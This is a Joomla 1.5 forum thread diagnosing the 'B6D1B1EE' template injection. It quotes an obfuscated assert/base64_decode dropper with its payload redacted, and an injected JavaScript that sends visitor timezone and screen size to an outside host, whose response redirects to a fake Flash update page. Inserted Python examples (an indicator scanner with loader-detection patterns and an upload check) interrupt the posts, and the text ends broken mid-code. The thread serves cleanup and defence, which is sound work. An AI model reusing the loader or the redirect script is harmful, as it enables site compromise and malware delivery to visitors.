";} /*B6D1B1EE*/ ?> at top of site

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 4:42 pm

Hi there. Today I noticed I have the text ";} /*B6D1B1EE*/ ?> right at the top of my site. I have googled this and it seems a lot of Joomla 1.5 sites have this, but there is no discussion about it.

You can see the other sites in search results:
https://www.google.co.uk/#q=%22%3B%7D+% ... %2F+%3F%3E

I'd like to get rid of it and also know what it is; any help gratefully received!
Thanks
Terry

dhuelsmann
Joomla! Master
Posts: 19643
Joined: Sun Oct 02, 2005 12:50 am
Location: Omaha, NE

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by dhuelsmann » Mon Aug 29, 2016 4:57 pm

Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 5:48 pm

I have found it in my template index file, but can't see any suspicious code near it. Odd.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 5:49 pm

dhuelsmann wrote: Since the 1.5.x series reached end of life in September 2012, my first guess is that your site has been hacked along with all the others you found.
Yeah, I am unsure. I found the text in my template's index file, in this code:


require(YOURBASEPATH . DS . "rt_head_includes.php");
?>


";} /*B6D1B1EE*/ ?>
<?php /*d0eeaa88*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id)) {echo "


I can't see anything there that looks really suspicious however, can anyone else?

Thanks again

dhuelsmann
Joomla! Master
Posts: 19643
Joined: Sun Oct 02, 2005 12:50 am
Location: Omaha, NE

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by dhuelsmann » Mon Aug 29, 2016 5:54 pm

Use the site malware scanner at https://sitecheck.sucuri.net/

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:04 pm

Thanks for that, no malware found, but an alert to my outdated version of Joomla

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 6:37 pm

No malware found doesn't mean you weren't hacked. You could have been spam-link defaced.
I searched that sequence and found that on every site I checked, they were running out-of-date Joomla AND running mod_stats with a variation of statsr57.php or similar n

e.g.

/media/stat522.php >

should be nowhere near the media directory.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:44 pm

Thanks mandville, what would be your course of action? I will try and get the Joomla updated, but in the meantime I am unsure what to do.
I have removed the ";} /*B6D1B1EE*/ ?> from the index.php file and all seems OK, although I know that is just a workaround.

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 6:46 pm

I edited my post but you should really be looking for the r57 shell file. Hints seem to point to php files in the media directory.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:52 pm

mandville wrote: I edited my post but you should really be looking for the r57 shell file. Hints seem to point to php files in the media directory.
Thanks, there are no php files in the root of media, and the only text I see in the code near the issue is:


src=/modules/mod_stats/statd0e.php

That doesn't look right to me - I am not a programmer but will look at that file now

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 6:54 pm

OK that file contains this:

<?php



$udinrg="\x61"."\x73"."\x73"."\x65".chr(114).chr(116);
$blmjnrcdi=chr(98)."a"."s"."e"."\x36"."\x34".chr(95)."d"."\x65".chr(99)."o"."\x64"."e";

@$udinrg(
@$blmjnrcdi(
'='));
## ###############################################################################
Last edited by mandville on Mon Aug 29, 2016 7:04 pm, edited 1 time in total.
Reason: Redacted hack code

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 7:24 pm

I redacted the code just in case. You should run and post the FPA so we can see what else is going on. Or you could just follow the hacked site sticky and rebuild using the latest secure version.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 7:42 pm

mandville wrote: I redacted the code just in case. You should run and post the FPA so we can see what else is going on. Or you could just follow the hacked site sticky and rebuild using the latest secure version.
Hi there, I have run the FPA; would you like me to PM you the URL to it or paste any info here?
Thanks for the help so far, it really is appreciated.

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 7:53 pm

Please post as per the instructions.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Mon Aug 29, 2016 8:10 pm

Forum Post Assistant (v1.2.7) : 29th August 2016 wrote:
Basic Environment :: Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: user_1075945597 (uid: 1/gid: 1) | Group: root (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-410.el5.centos.plus | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/linweb32/t/mywebsiteaddress-1075945598/user/htdocs | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 6143 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.95-log (Client:5.1.50) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 62.57 MiB | #of Tables:  697
Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bz2 () | calendar () | ctype () | curl () | hash (1.0) | filter (0.11.0) | ftp () | gettext () | gmp () | session () | iconv () | pcntl () | posix () | readline () | Reflection (0.1) | standard (5.2.17) | shmop () | SimpleXML (0.1) | SPL (0.2) | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | cgi-fcgi () | bcmath () | dbase () | dom (20031129) | gd () | imap () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_pgsql (1.0.2) | pdo_sqlite (1.0.1) | pgsql () | soap () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.8.11) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: podcast/ (707) |
Extensions Discovered ::
Templates Discovered :: Templates :: SITE :: beez (1.0.0) | jTemplate (1.0.3) | rt_iridium_j15 (1.5.0) | rhuk_milkyway (1.0.2) | JA_Purity (1.2.0) |
Templates :: ADMIN :: Khepri (1.0) |

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Mon Aug 29, 2016 9:58 pm

Summary:
- extensions out of date
- folder podcast: incorrect permission, no related extension
- PHP version out of date
- etc.

MiscCoder
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 4:03 pm

Sites I maintain were also hit by this in the past 48 hours. This was embedded into every template, where XXX is 3 random characters:
http://pastebin.com/redacted

The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))). Then with a bit of cleanup and some deobfuscation (the comments are a part of the exploit code) we get:
http://pastebin.com/redacted

This is downloading from hxxp://redacted.net/id4.php the following:
http://pastebin.com/redacted

which then downloads this from hxxp://redacted.net/id4.php?id=4 :
http://pastebin.com/redacted

Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I'm still looking into how this was embedded into the templates though.
Last edited by mandville on Tue Aug 30, 2016 4:34 pm, edited 1 time in total.
Reason: redacted link - do not link to hacking scripts

MiscCoder
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 6:58 pm

Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts", despite the fact that anything I linked to was the result of being hacked, not a script to hack a Joomla site in the first place. This is a potentially huge issue in the works and there needs to be some place to discuss it; seeing as this thread is the first 3 Google results for "B6D1B1EE", this thread should provide the info required to diagnose and resolve this breach. 36 hours ago this affected 36,000 sites, 6 hours ago it affected 89,000 sites, now it is affecting 118,000 sites. While this intrusion itself isn't successfully doing anything, whatever entry point it is using is still there.

If your site is showing "B6D1B1EE" in the header you need to search every template for this code and remove it:

This is not a "hacking script," this is what every infected template needs to have removed from it; not making this information easily available is harmful to anyone who is forced to still maintain a Joomla 1.5 site:
http://pastebin.com/CaP85wrM

You then need to remove the statXXX.php file that has been placed into your /modules/mod_stat/ directory. The script also places 2 files in your /tmp directory, but they are just used for storing timestamps; feel free to empty that directory as well (it is just temporary after all).

The code that resides in the statXXX.php file unwraps to assert(base64decode(eval(base64decode(*stuff*)))). Then with a bit of cleanup and some deobfuscation we get some code that over-complicates downloading a simple JavaScript file and attempting to embed it in the header of every page view. The code also leaves dangling connections, which results in the server's memory being clogged more and more after every page view; restarting Apache seemed to fix that.

The malicious code is downloading from hxxp://censored.net/id4.php the following:

This is not a "hacking script," it is a simple JavaScript include:

var script = document.getElementById("scriptData"); //createElement("script");
script.src="http://censored.net/js/analytic.php?id=4";
//document.head.appendChild(script);
which then downloads this from hxxp://censored.net/id4.php?id=4 :

This is not a "hacking script," it is simple JavaScript for getting the timezone and screen size:

<!--
function tzSignature() {
        var tz;
        try {
                var currDate = new Date();
                var currTime = currDate.toString();
                tz = currDate.getTimezoneOffset();
                if ( (currTime.indexOf("PDT") > 0) ||
                     (currTime.indexOf("MDT") > 0) ||
                     (currTime.indexOf("CDT") > 0) ||
                     (currTime.indexOf("EDT") > 0) ||
                     (currTime.indexOf("Daylight") > 0) )
                        tz += 60;
                tz = - tz / 60;
        } catch (e) {
                tz = "";
        }
        return tz;
}
 
function rsSignature() {
        var rs;
        try {
                var rsWidth = screen.width;
                var rsHeight = screen.height;
                var rs = rsWidth + "x" + rsHeight;
        } catch (e) {
                rs = "";
        }
        return rs;
}
 
var script = document.createElement("script");
 
script.src="http://censored.net//js/analytic.php?id=4&tz="+tzSignature()+'&rs='+rsSignature();
 
document.head.appendChild(script);
 
//document.write('<sc'+'ript type="text/javascript" src="http://censored.net//js/analytic.php?id=4&tz='+tzSig$
//-->
Which is just sending the timezone as UTC offset and screen resolution. It seems like whoever is executing this large scale attack doesn't really know what they are doing. Nothing harmful is actually occurring, it's super obvious when a site has been affected, and the code doesn't even work as expected. I've tried every UTC offset and every common desktop/tablet/phone resolution and in every attempt it just returns the exact same script, which if the exploit code was actually working as intended would loop infinitely.
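The cleanup MiscCoder describes (the ";} /*B6D1B1EE*/ ?> marker in every template, the statXXX.php dropper under mod_stats, the string-assembled assert/base64_decode loader) together with mandville's point that PHP files do not belong under /media can be turned into a simple indicator scan for a defender checking a 1.5 install. This is an added example, not code from the thread or from Joomla; the sample site tree it builds is constructed, and the patterns and directory names are assumptions drawn from what the posters reported.

```python
"""Indicator scan for the B6D1B1EE template injection discussed in this thread.

Added example: not code from the thread or from Joomla. The regular expressions
and directory names are assumptions based on what the posters reported, and the
sample site built by build_sample_site() is constructed for the demonstration.
"""
import re
import tempfile
from pathlib import Path

# The injected PHP closes with a stray  ";} /*XXXXXXXX*/ ?>  (8 hex digits) that
# ends up rendered at the top of every page.
INJECTION_MARKER = re.compile(r'";\}\s*/\*[0-9A-Fa-f]{8}\*/\s*\?>')
# The injected block only acts for visitors who are not logged in.
SESSION_HOOK = re.compile(r'\$_SESSION\["__default"\]\["user"\]')
# The dropper builds function names out of "\xNN" and chr() pieces and then
# calls them through a variable: @$name(@$other(...)).
STRING_ASSEMBLY = re.compile(r'(?:"\\x[0-9a-fA-F]{2}"|chr\(\d+\))\s*\.')
VARIABLE_CALL = re.compile(r'@\$[A-Za-z_]\w*\s*\(')
# Dropped file name seen in the thread: stat + three random characters.
DROPPED_STAT_FILE = re.compile(r'^stat[0-9a-z]{3}\.php$', re.IGNORECASE)
STATS_MODULE_DIRS = ('mod_stats', 'mod_stat')   # both spellings appear in the thread
SCANNED_SUFFIXES = ('.php', '.html', '.js')


def content_indicators(text: str) -> list:
    """Reasons a file's contents look like part of this infection."""
    reasons = []
    if INJECTION_MARKER.search(text):
        reasons.append('template injection marker')
    if SESSION_HOOK.search(text):
        reasons.append('guest-session hook')
    if STRING_ASSEMBLY.search(text) and VARIABLE_CALL.search(text):
        reasons.append('obfuscated dynamic call (assert/base64_decode loader)')
    return reasons


def path_indicators(rel_path: str) -> list:
    """Reasons a file's location alone is suspicious (rel_path uses '/')."""
    parts = rel_path.split('/')
    name = parts[-1]
    reasons = []
    if name.lower().endswith('.php') and parts[0] == 'media':
        reasons.append('php file under media/')
    if (len(parts) >= 3 and parts[0] == 'modules'
            and parts[1] in STATS_MODULE_DIRS and DROPPED_STAT_FILE.match(name)):
        reasons.append('stat*.php dropped into mod_stats')
    return reasons


def scan_tree(root) -> dict:
    """Walk a site root; return {relative path: [reasons]} for flagged files."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob('*')):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        reasons = path_indicators(rel)
        try:
            reasons += content_indicators(path.read_text(errors='replace'))
        except OSError:
            pass
        if reasons:
            hits[rel] = reasons
    return hits


def build_sample_site(base) -> Path:
    """Constructed Joomla-like tree: two infected files, one stray PHP file
    under media/, and two clean files that must not be flagged."""
    files = {
        'templates/rt_iridium_j15/index.php':
            '<?php require(YOURBASEPATH . DS . "rt_head_includes.php"); ?>\n'
            '";} /*B6D1B1EE*/ ?>\n'
            '<?php /*d0eeaa88*/ if(is_object($_SESSION["__default"]["user"]) '
            '&& !($_SESSION["__default"]["user"]->id)) {echo "\n',
        'templates/beez/index.php':
            '<?php defined("_JEXEC") or die(); ?>\n<html></html>\n',
        'modules/mod_stats/mod_stats.php':
            '<?php defined("_JEXEC") or die(); ?>\n',
        # Loader shaped like the redacted one in the thread; payload replaced.
        'modules/mod_stats/statd0e.php':
            '<?php\n$udinrg="\\x61"."\\x73"."\\x73"."\\x65".chr(114).chr(116);\n'
            '@$udinrg(@$blmjnrcdi(\'REDACTED\'));\n',
        'media/stat522.php': '<?php echo "stray"; ?>\n',
    }
    root = Path(base)
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


def demo_scan() -> dict:
    """Build the constructed site in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_site(tmp))


if __name__ == '__main__':
    for rel, reasons in demo_scan().items():
        print(f'{rel}: {", ".join(reasons)}')
```

Point scan_tree() at a real document root to list flagged files; a hit on the marker or the loader pattern is a reason to restore from a clean backup rather than just delete the line, as the thread goes on to say.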

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Tue Aug 30, 2016 7:47 pm

Not sure why people are "forced" to still be running a 1.5 site. Perhaps the same people who are using Samsung S2, iPhone 5, HTC Wildfire, Windows XP or leaded petrol etc. [analogy]
As you state, we don't allow links to any code that can be used for illegal means.

As stated in previous posts: out-of-date Joomla, possibly out-of-date PHP, possibly out-of-date extensions.
What do you have in common with the OP beyond using 1.5?
https://docs.joomla.org/Security_Checkl ... or_defaced is where you should be heading next

MiscCoder
Joomla! Fledgling
Posts: 4
Joined: Tue Aug 30, 2016 2:30 pm

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by MiscCoder » Tue Aug 30, 2016 8:11 pm

Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid-2000s. If it were up to me they wouldn't still be on 1.5.26.

All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.

mandville
Joomla! Master
Posts: 14689
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by mandville » Tue Aug 30, 2016 8:31 pm

Are the sites you have on 1.5 with the 1.5.26+ patch (or whatever people called it) that was issued after EOL? http://joomlacode.org/gf/project/joomla ... m_id=31626

ozneilau
Joomla! Guru
Posts: 857
Joined: Tue Aug 04, 2009 9:05 am
Location: Tasmania, Australia

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by ozneilau » Wed Aug 31, 2016 12:37 pm

mandville wrote: Are the sites you have on 1.5 with the 1.5.26+ patch (or whatever people called it) that was issued after EOL?
There are 2 security hotfixes for Joomla 1.5.26, the Session Hardening patch and the File Upload Security patch, which can be found at: https://docs.joomla.org/Security_hotfix ... L_versions

harps_kal
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Wed Aug 31, 2016 4:21 pm

Hello all,

I'm pretty new to Joomla, having been told to fix this issue this morning (pretty stressed).

I actually have the ;} /*B6D1B1EE*/ ?> issue as well as someone POSTing to Joomla to send spam.

As of this moment, I've deleted Joomla and turned the DB off.

Am I still vulnerable to the exploit?

I can see IPs trying to POST to /libraries/phpxmlrpc/compat/article48.php ... obviously failing because Joomla is no longer there.

Cheers in advance

harps_kal
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Wed Aug 31, 2016 4:29 pm

Actually when I say "Am I still vulnerable to the exploit?" .... I mean what else should I be afraid of?

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Wed Aug 31, 2016 5:00 pm

MiscCoder wrote: Seeing as a mod gutted my previous post of all useful information, and I can't edit it, this should hopefully avoid "linking to hacking scripts" despite the fact that anything...
Thanks for all this!
I have removed the statd0e.php file, I had nothing in my temp folder, but from what you say this is a pretty badly written nasty, so no surprises there I guess.

I've checked everything else out and made another backup just in case.

Again, thank you.

terryscott
Joomla! Apprentice
Posts: 44
Joined: Mon Oct 03, 2011 10:17 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by terryscott » Wed Aug 31, 2016 5:02 pm

MiscCoder wrote: Several clients of the company I work for are small pro-bono/non-profit clients that have zero budget to pay us to update their sites, sites which were established in the mid 2000's. If it were up to me they wouldn't still be on 1.5.26

All server software is up to date, this is an exploit that exists in Joomla 1.5.26. The modifications to the templates, /modules/mod_stat/statXXX.php file, and 2 files in the /tmp directory are the only changes this intrusion has made. Since my last post the number of results on google for "B6D1B1EE" has grown by another 4000.
I agree with this, and this is my situation too.
The simple fact is there are a lot of people on 1.5 who don't have the budget to upgrade.

I will however push them to do so after this, hopefully they listen.

fcoulter
Joomla! Ace
Posts: 1668
Joined: Thu Sep 13, 2007 11:39 am
Location: UK

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Thu Sep 01, 2016 8:07 pm

I have been looking into this issue on behalf of the VEL since this morning. It seems that the actual script injected doesn't do anything dangerous, either because the attacker was not very competent, or maybe just wanted a proof of concept. That is just our good luck; we should definitely be very worried about this. From the number of sites affected it is obvious that this is an automated attack, and therefore it seems it could easily be replicated, except with some real malware next time.

It seems that the attack involves adding a php file to mod_stats. I have checked the module and I cannot find any obvious weakness in it; it is most likely that it is just a convenient place to try to hide a file and nothing to do with the module itself.

I think that by far the most likely way that this attack is accomplished is through the known vulnerability in com_media which was discovered back in 2013, which uses an empty file extension to bypass the normal file checks.

So how to protect against the attack?

The most preferred option is to update your site to the latest Joomla, 3.6.2, it is much more secure. However it is quite a complex migration path from 1.5 to 3.6, and inevitably takes time. It seems to me that there are some basic security hardening steps that you can take that should offer some protection against the com_media hack in the meantime.

1. Update your site to the latest version of 1.5, that is 1.5.26; unless someone has been hacking the core code that ought to be possible.

2. Apply the file upload vulnerability patch; it is available here at the bottom of the page: http://joomlacode.org/gf/project/joomla ... m_id=31626

3. In the Joomla configuration, make sure that user registration is disabled; unfortunately by default in J1.5 anyone can create an active account on your site unless you disallow it; unless of course this is impossible, for example on an e-commerce store.

4. In the com_media options, make sure that the Restrict Uploads option is set to "YES".

5. Also in the com_media options, set Check Mime Type to "NO". This may seem counterintuitive, but what this does is restrict uploads of non-image files to administrators only.

To explain why I am suggesting these steps:

The basic problem is weak ACL in com_media in Joomla 1.5: any registered user can access the file controller upload task, and anyone by default can register themselves as a user. Then whether a file can be uploaded only depends on the canUpload() test in com_media/helpers/media.php; it is that test the empty file extension vulnerability managed to exploit.

The Mime Check option matters because as a test it is very weak in fact completely useless as far as security is concerned: a PHP file would pass it, so it is much better to turn it off and instead restrict uploads to those with admin login privileges (managers, administrators and super users).

Still it is far better to migrate your site to Joomla 3, even if you manage to patch all the security issues in the Joomla Core you will still probably have extensions that contain vulnerabilities.
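Added example, not Joomla's code and not fcoulter's: a Python model of the hardened upload check the steps above aim at, rejecting the empty-extension case outright and allowing non-image files only to the admin roles named above instead of relying on the MIME check. The role names, the image allow-list and the magic-byte table are my assumptions; the real canUpload() in com_media/helpers/media.php is not reproduced here.

```python
"""Added example (not Joomla's own code): an upload check modelled on the
com_media hardening described above. Role names, the image allow-list and
the magic-byte table are assumptions, not taken from Joomla 1.5."""
import os

IMAGE_EXTS = {"jpg", "jpeg", "png", "gif", "bmp"}
# Roles allowed to upload non-image files once "Restrict Uploads" is on
# (the thread names managers, administrators and super users).
ADMIN_ROLES = {"manager", "administrator", "super administrator"}
SCRIPT_EXTS = {"php", "phtml", "php3", "php4", "php5", "phar"}
# Constructed magic bytes for the image types allowed above.
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "bmp": b"BM",
}


def can_upload(filename: str, head: bytes, role: str,
               restrict_uploads: bool = True) -> tuple[bool, str]:
    """Return (allowed, reason).

    Rejects the empty-extension case the 2013 com_media bypass relied on
    and, with restrict_uploads, limits non-image files to admin roles,
    which is what "Check Mime Type = NO" plus "Restrict Uploads = YES" does.
    """
    base = os.path.basename(filename)
    if base != filename or not base or base.startswith("."):
        return False, "path components or dotfile not allowed"
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[-1] == "":
        # "file" or "file." has no usable extension; the old test let it pass
        return False, "missing or empty extension"
    ext = parts[-1]
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        # catches shell.php and double extensions such as shell.php.jpg
        return False, "server-side script extension in name"
    if ext in IMAGE_EXTS:
        if not head.startswith(MAGIC[ext]):
            return False, "content does not match image extension"
        return True, "image"
    # Non-image file: only admin roles when uploads are restricted.
    if restrict_uploads and role.lower() not in ADMIN_ROLES:
        return False, "non-image upload restricted to administrators"
    if head.lstrip().startswith(b"<?"):
        return False, "PHP open tag in content"
    return True, "non-image (admin)"
```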

User avatar
fcoulter
Joomla! Ace
Joomla! Ace
Posts: 1668
Joined: Thu Sep 13, 2007 11:39 am
Location: UK
Contact:

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by fcoulter » Thu Sep 01, 2016 10:05 pm

Actually I did some more testing, and it seems that the script injected into mod_stats may not be so harmless.

It seems to try to get information about the time zone and screen dimensions and then load itself again with that information supplied in the URL.

If you load the URL http://*********.net/js/analytic.php?id=4&tz=60&rs=800x600, i.e. with a time zone and screen dimensions, then it actually returns this JavaScript:

window.open('http://************.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');

That URL, which I have obscured, is a fake Adobe update site; it is most likely trying to produce a fake Flash update notice to trick users into downloading malware. If it is not working, that is just good luck on our part.

rogeriovaz
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Sep 02, 2016 8:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by rogeriovaz » Fri Sep 02, 2016 8:18 am

Hi guys,

I have been affected by this injection as well, and it seems that in some way JavaScript files and PHP files were created. At the beginning I reacted as you did; however, I realised that the website is constantly sending emails to all clients and employees.
Has someone found a solution for it?
Follow my FPA:

Problem Description :: Suddenly my website starts to send email to every one of my clients and even the employees.

Forum Post Assistant (v1.2.7) : 2nd September 2016

Basic Environment ::
Joomla! Instance :: Joomla! 1.5.26-Stable (senu takaa ama busani) 27-March-2012
Joomla! Configured :: Yes | Writable (755) | Owner: fosseway (uid: 1/gid: 1) | Group: fosseway (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 1 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: 0 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-504.12.2.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/fosseway/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.4.44 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 2M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.6.31 (Client:mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 49.00 MiB | #of Tables:  119

harps_kal
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 31, 2016 11:02 am

Re: ";} /*B6D1B1EE*/ ?> at top of site

Post by harps_kal » Fri Sep 02, 2016 1:03 pm

rogeriovaz wrote:Hi guys,
I have been affected by this injection as well and it seems that in some way javascript files and php files were created. At the beginning I reacted as you however I realised that the website is sending emails constantly to all clients and employees.
Have someone found a solution for it?
Follow my FPA
The same for me.

The attacker was using an HTTP POST to /libraries/phpxmlrpc/compat/article48.php to send spam mail.

They also changed the modified date of article48.php so that it wasn't obvious.

I also got some spam email from this forum as soon as I registered.

While I work out what to do, I am using a static rip of the Joomla site.
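Added example (not from the thread or from Joomla): a Python check over web-server access logs for requests to PHP files outside the normal Joomla entry points, the pattern described above (POSTs to /libraries/phpxmlrpc/compat/article48.php) and the /js/analytic.php loader fcoulter saw earlier. Because the attacker reset the file's modified date, the access log is a more reliable trace than file timestamps; the entry-point list and the sample log lines are constructed assumptions.

```python
"""Added example (not the thread's or Joomla's code): flag requests to PHP
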